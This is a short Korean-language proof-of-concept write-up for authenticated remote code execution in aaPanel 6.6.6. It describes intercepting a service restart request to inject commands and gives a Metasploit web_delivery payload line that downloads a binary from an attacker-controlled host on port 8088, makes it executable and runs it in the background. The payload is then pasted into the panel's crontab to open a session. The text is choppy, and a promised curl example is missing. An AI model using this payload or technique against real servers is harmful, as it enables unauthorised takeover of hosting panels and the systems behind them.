
aapanel 6.6.6 - (인증된) 원격 코드 실행
이 PoC를 만들기 위해 docker-compose로 소프트웨어를 설치했습니다.
Software Store로 이동하여 설정 필드의 아무 행이나 클릭한 다음, "start/stop/restart"를 클릭할 때 요청을 가로채서 원하는 명령을 실행하도록 요청을 수정/편집하세요. 다음은 curl을 사용한 예시입니다:
이 PoC를 만들기 위해 Ubuntu 20.04를 새로 설치한 후, wget + sudo를 설치하고 다음 스크립트를 실행했습니다. wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh
먼저 web_delivery 옵션을 설정하세요. 그러면 페이로드와 리스너가 생성됩니다.
이제 실행하세요.
그러면 다음 페이로드가 생성됩니다:
wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown
그런 다음 aapanel의 crontab 메뉴에 있는 script content에 다음과 같이 복사/붙여넣기 하세요.
이제 crontab을 실행하고 세션을 기다리세요.
msfconsole -r aapanel.rc를 실행하고, 페이로드를 script content 섹션에 복사/붙여넣기한 다음 세션을 즐기세요.